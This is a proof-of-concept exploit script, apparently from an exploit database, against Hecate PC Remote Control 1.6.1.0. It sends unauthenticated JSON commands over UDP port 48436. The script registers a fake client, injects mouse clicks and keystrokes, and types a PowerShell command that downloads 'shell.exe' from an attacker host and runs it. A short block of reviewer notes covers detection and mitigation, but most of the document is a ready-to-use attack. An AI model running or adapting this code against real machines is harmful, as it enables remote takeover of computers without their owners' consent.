# Exploit Title: Hecate - PC Remote Control 1.6.1.0 - Remote Code Execution
# Date: 29/06/25
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://risefall.org
# Software Link: https://apps.microsoft.com/detail/9mxqtf885mjp?hl=en-US&gl=US
# Version: 1.6.1.0
# Tested on: Windows 10

'''
Description:
Hecate - PC Remote Control 1.6.1.0 listens on UDP port 48436 and accepts
unauthenticated JSON commands for keyboard and mouse input. This lack of
authentication allows a remote attacker to simulate user interaction, open
system dialogs, and execute arbitrary commands.
'''

# Reviewer notes (defensive reading of the protocol as exercised below):
# - Every datagram is plain JSON over UDP with no credential, signature or
#   server-issued token; the only identity is a client-chosen "phoneId" that
#   the client itself registers via the "init" command.  Any host that can
#   reach UDP/48436 can therefore register and inject input.
# - Detection: inbound UDP/48436 traffic from hosts that are not the paired
#   phone app, an "init" registration from an unexpected source, and a burst
#   of one-character "sendKey" commands followed by "enter".
# - Mitigation: keep the port off untrusted networks (host firewall scoped to
#   the trusted segment); a real fix needs the vendor to authenticate the
#   pairing/command channel.

import socket
import json
import uuid
from datetime import datetime
import time

# Configuration used by the original PoC (attacker host, target host, port,
# and the file name fetched from LHOST).
LHOST = "192.168.8.100"
TARGET_IP = "192.168.8.105"
PORT = 48436
PAYLOAD = "shell.exe"
# The client id is simply a fresh random UUID, upper-cased, presented to the
# service in the "init" handshake and echoed in every later command.
PHONE_ID = str(uuid.uuid4()).upper()


def _command(name, data=None):
    """Build the command envelope the service expects.

    Keys are emitted in the order command / phoneId / data so the wire
    bytes match the original PoC exactly; ``data`` is ``null`` when the
    command carries no arguments.
    """
    return {"command": name, "phoneId": PHONE_ID, "data": data}


def send_packet(packet):
    """Serialise ``packet`` as UTF-8 JSON and send it to TARGET_IP:PORT over UDP.

    A short-lived datagram socket is opened per call; nothing is ever read
    back because the PoC does not depend on any reply from the service.
    """
    encoded = json.dumps(packet).encode('utf-8')
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as udp:
        udp.sendto(encoded, (TARGET_IP, PORT))


def mouse_move_start():
    """Announce the start of a pointer-move sequence (sent before mouseMove)."""
    send_packet(_command("mouseMoveStart"))


def mouse_move(x, y):
    """Send a mouseMove with coordinates (x, y).

    The PoC's usage (a huge move followed by a small nudge) suggests the
    values are relative offsets — not confirmed from here.
    """
    send_packet(_command("mouseMove", {"x": x, "y": y}))


def mouse_click():
    """Send a single mouseClick at the current pointer position."""
    send_packet(_command("mouseClick"))


def send_key(key_str):
    """Send one sendKey command carrying ``key_str`` (a character or key name)."""
    send_packet(_command("sendKey", {"key": key_str}))


def send_text(text):
    """Type ``text`` one keystroke at a time, pausing 80 ms between keys."""
    for ch in text:
        send_key(ch)
        time.sleep(0.08)


def execute_payload():
    """Drive the desktop via injected input and type the download-and-run line.

    Sequence: start a pointer move, push the pointer far to one corner,
    nudge it and click (presumably landing on a launcher/search control —
    the PoC does not verify what it hit), wait 3 s for the UI, then type the
    command string character by character and confirm with Enter.
    """
    mouse_move_start()
    mouse_move(-9999, 9999)
    time.sleep(0.5)
    mouse_move(15, -10)
    time.sleep(0.3)
    mouse_click()
    time.sleep(3)
    print("typing payload..")
    # Command string is byte-identical to the original PoC (split for width only).
    command_line = (
        f"cmd /c powershell -c \"iwr http://{LHOST}/{PAYLOAD} "
        f"-OutFile $env:TEMP\\{PAYLOAD}; Start-Process $env:TEMP\\{PAYLOAD}\""
    )
    send_text(command_line)
    time.sleep(0.5)
    send_key("enter")
    print("payload executed check your listener!")


if __name__ == "__main__":
    # Register as a new "phone" client so the service associates PHONE_ID
    # with a session; field names and order match the original packet.
    registration = {
        "id": PHONE_ID,
        "brand": "ExploitDevice",
        "model": "Exploit",
        "platform": "Android",
        "ip": LHOST,
        "port": PORT,
        "connectedAt": datetime.now().strftime("%Y-%m-%d %H:%M:%S.%f"),
    }
    send_packet(_command("init", registration))
    time.sleep(2)
    execute_payload()